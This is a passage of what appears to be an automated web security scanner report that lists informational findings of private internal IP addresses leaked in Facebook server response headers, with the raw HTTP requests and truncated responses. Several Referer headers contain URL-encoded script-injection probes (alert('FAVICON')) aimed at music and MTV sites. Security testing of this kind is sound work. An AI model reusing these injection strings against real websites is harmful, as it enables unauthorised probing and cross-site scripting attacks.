User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
ETag: "4cee9fd4a0927297616c6d703f3dd063"
X-FB-Server: 10.27.6.104
X-Cnection: close
Content-Length: 14288
Vary: Accept-Encoding
Cache-Control: public, max-age=1184
Expires: Mon, 13 Jun 2011 11:53:36 GMT
Date: Mon, 13 Jun 2011 11:33:52 GMT
Connection: close

/*1303255697,169543272,JIT Construction: v368160,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...

22.27. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.22.124

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP
If-None-Match: "9e3106da3fd26e292a3816c4123dbbeb"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "f4552b4111a9fea7469f2ff69a1d6467"
X-FB-Server: 10.33.22.124
X-Cnection: close
Content-Length: 211463
Vary: Accept-Encoding
Cache-Control: public, max-age=880
Expires: Mon, 13 Jun 2011 11:33:25 GMT
Date: Mon, 13 Jun 2011 11:18:45 GMT
Connection: close

/*1307493996,169940604,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.28. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.182.114

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "f4552b4111a9fea7469f2ff69a1d6467"
X-FB-Server: 10.32.182.114
X-Cnection: close
Content-Length: 211463
Vary: Accept-Encoding
Cache-Control: public, max-age=152
Expires: Mon, 13 Jun 2011 11:36:22 GMT
Date: Mon, 13 Jun 2011 11:33:50 GMT
Connection: close

/*1307493737,169916018,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.29. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.113.126

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "6dddf78dae66d230b9412799cde35fa5"
X-FB-Server: 10.32.113.126
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=215
Expires: Mon, 13 Jun 2011 11:36:03 GMT
Date: Mon, 13 Jun 2011 11:32:28 GMT
Connection: close

/*1307496756,169898366,JIT Construction: v388875,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.30. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.152.131

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP
If-None-Match: "addc56fa32b850cc30f3a39f08148f99"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "6dddf78dae66d230b9412799cde35fa5"
X-FB-Server: 10.32.152.131
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=861
Expires: Mon, 13 Jun 2011 11:32:39 GMT
Date: Mon, 13 Jun 2011 11:18:18 GMT
Connection: close

/*1307583495,169908355,JIT Construction: v389406,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

22.31. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/XdCommReceiver.debug.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.9.129

Request

GET /js/api_lib/v0.4/XdCommReceiver.debug.js HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.27.9.129
X-Cnection: close
Content-Length: 3390
Vary: Accept-Encoding
Cache-Control: max-age=44207
Expires: Mon, 13 Jun 2011 23:49:38 GMT
Date: Mon, 13 Jun 2011 11:32:51 GMT
Connection: close

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver-debug
*
...[SNIP]...

22.32. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.facebook.com
Path:	/js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/xd_receiver.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 3386
Vary: Accept-Encoding
Cache-Control: max-age=1606965
Expires: Sat, 02 Jul 2011 01:41:40 GMT
Date: Mon, 13 Jun 2011 11:18:55 GMT
Connection: close

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...

22.33. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 3327
Vary: Accept-Encoding
Cache-Control: public, max-age=1546
Expires: Mon, 13 Jun 2011 11:37:55 GMT
Date: Mon, 13 Jun 2011 11:12:09 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

22.34. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc559d2d4%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff39bc43f7c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%253A%252F%252Fwww.mavsmoneyball.com%252F2011%252F6%252F12%252F2220848%252Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=630
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 3327
Vary: Accept-Encoding
Cache-Control: public, max-age=451
Expires: Mon, 13 Jun 2011 11:10:14 GMT
Date: Mon, 13 Jun 2011 11:02:43 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

22.35. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1269acb28%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ffe0d54744%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 3327
Vary: Accept-Encoding
Cache-Control: public, max-age=1465
Expires: Mon, 13 Jun 2011 11:27:24 GMT
Date: Mon, 13 Jun 2011 11:02:59 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

22.36. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/images/fbconnect/login-buttons/connect_light_medium_short.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /images/fbconnect/login-buttons/connect_light_medium_short.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.138.16.185
Content-Length: 1016
Cache-Control: max-age=1801153
Expires: Mon, 04 Jul 2011 07:38:07 GMT
Date: Mon, 13 Jun 2011 11:18:54 GMT
Connection: close

GIF89aY....?.;Y....A^.Vq.D`....h..f~.j.._x.az.Oj.d|.Hd.[t.Kf.Yr.Sn.B\....>Y....;S.=V.Ia..........u.....AX....z..~..y..Og....i|.F_....To....Sh.Rl.m.n..Um....l..j.....g.......q..cy.......s..av.c|.k..]
...[SNIP]...

22.37. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/images/fbconnect/login-buttons/connect_light_medium_short.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.184

Request

GET /images/fbconnect/login-buttons/connect_light_medium_short.gif HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.138.69.184
Content-Length: 1016
Cache-Control: max-age=1800427
Expires: Mon, 04 Jul 2011 07:42:10 GMT
Date: Mon, 13 Jun 2011 11:35:03 GMT
Connection: close

GIF89aY....?.;Y....A^.Vq.D`....h..f~.j.._x.az.Oj.d|.Hd.[t.Kf.Yr.Sn.B\....>Y....;S.=V.Ia..........u.....AX....z..~..y..Og....i|.F_....To....Sh.Rl.m.n..Um....l..j.....g.......q..cy.......s..av.c|.k..]
...[SNIP]...

22.38. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/nXqcdeyQ5vr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y2/r/nXqcdeyQ5vr.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/y2/r/nXqcdeyQ5vr.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 21 Mar 2011 17:28:12 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 18537
Vary: Accept-Encoding
Cache-Control: public, max-age=27663012
Expires: Sat, 28 Apr 2012 15:22:20 GMT
Date: Mon, 13 Jun 2011 11:12:08 GMT
Connection: close

/*1304090479,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Rea6X"]); }

FBCommentServer={serverStarted:true,init:function(a){CSS.setClass($(a.commentsID).parentNode,'mu-connect-dis
...[SNIP]...

22.39. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/AkVjWVFFdhX.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/y3/r/AkVjWVFFdhX.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:29:32 GMT
X-FB-Server: 10.138.69.186
Content-Length: 6074
Vary: Accept-Encoding
Cache-Control: public, max-age=30899818
Expires: Tue, 05 Jun 2012 02:50:07 GMT
Date: Mon, 13 Jun 2011 11:33:09 GMT
Connection: close

/*1307328547,176833978*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JRfiS"]); }

var XD={_callbacks:[],_opts:{autoResize:false,allowShrink:true,channelUrl:null,hideOverflow:false,newResizeM
...[SNIP]...

22.40. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/xfp-ll5tNb2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/yB/r/xfp-ll5tNb2.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 08 Jun 2011 07:38:12 GMT
X-FB-Server: 10.138.69.182
Content-Length: 141138
Vary: Accept-Encoding
Cache-Control: public, max-age=31092827
Expires: Thu, 07 Jun 2012 08:26:56 GMT
Date: Mon, 13 Jun 2011 11:33:09 GMT
Connection: close

/*1307521668,176833974*/

if (window.CavalryLogger) { CavalryLogger.start_js(["efmla"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

22.41. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/XcVjTLuzQ2O.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yF/r/XcVjTLuzQ2O.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /rsrc.php/v1/yF/r/XcVjTLuzQ2O.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/comments.php?api_key=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df638c2e28%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&numposts=10&sdk=joey&title=Spotlight%20Items%20-%20Dallas%20Mavericks%20-%20Basketball%20Fan%20Apparel%20-%20mavgear.com&url=http%3A%2F%2Fwww.mavgear.com%2FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html&width=550&xid=http%253A%252F%252Fwww.mavgear.com%252FDallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:28:35 GMT
X-FB-Server: 10.138.16.182
Content-Length: 7236
Vary: Accept-Encoding
Cache-Control: public, max-age=30902451
Expires: Tue, 05 Jun 2012 03:12:59 GMT
Date: Mon, 13 Jun 2011 11:12:08 GMT
Connection: close

/*1307329978,176820406*/

if (window.CavalryLogger) { CavalryLogger.start_js(["XdtdS"]); }

ConnectLogin={init:function(a){this.appID=a.appID;this.oneClick=a.oneClick;XD.init(a);},login:function(a,c,b
...[SNIP]...

22.42. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yP/r/NSCTCZ866vV.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/yP/r/NSCTCZ866vV.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=119370714775514&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30d76fe18cfdd4%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ff22c4a3b34dfc98%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=12&header=false&height=258&id=235165748331&locale=en_US&sdk=joey&show_faces=true&stream=false&width=338

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
